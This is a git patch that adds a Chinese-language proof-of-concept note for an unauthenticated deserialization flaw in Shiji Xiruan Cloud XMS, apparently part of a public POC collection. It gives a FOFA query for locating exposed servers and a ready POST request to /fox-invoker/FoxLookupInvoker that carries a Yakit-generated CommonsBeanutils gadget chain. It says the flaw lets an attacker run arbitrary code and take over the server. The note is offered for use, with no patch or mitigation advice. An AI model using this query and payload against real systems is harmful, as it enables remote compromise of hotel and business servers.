From b35147eebd6c6bf7f278a0150a905b9b458c01d0 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Sun, 31 Dec 2023 23:20:44 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E8=A5=BF=E8=BD=AF=E4=BA=91XMS?=
 =?UTF-8?q?=E5=8F=8D=E5=BA=8F=E5=88=97=E5=8C=96=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 西软云XMS反序列化漏洞.md | 23 +++++++++++++++++++++++
 1 file changed, 23 insertions(+)
 create mode 100644 西软云XMS反序列化漏洞.md

diff --git a/西软云XMS反序列化漏洞.md b/西软云XMS反序列化漏洞.md
new file mode 100644
index 0000000..c01debc
--- /dev/null
+++ b/西软云XMS反序列化漏洞.md
@@ -0,0 +1,23 @@
+## 西软云XMS反序列化漏洞
+
+西软云XMS /fox-invoker/FoxLookupInvoker接口处存在反序列化漏洞，未经身份认证的攻击者可利用此漏洞执行任意代码，获取服务器权限。
+
+## fofa
+```
+app="shiji-西软云XMS"
+```
+
+## poc
+```
+POST /fox-invoker/FoxLookupInvoker/?return-exception=true HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
+Connection: close
+ 
+{{hexdec(cb18x的序列化链)}
+```
+使用yakit 生成payload
+![c5fe271fed6a284b93b64e1023b2b581](https://github.com/wy876/POC/assets/139549762/2b6a22d6-7125-4f43-ae6a-253a92d83d23)
+
+![e79d4907bddf12878c085d3146d856bc](https://github.com/wy876/POC/assets/139549762/799da585-0c34-431e-baa8-f939b19610a3)
+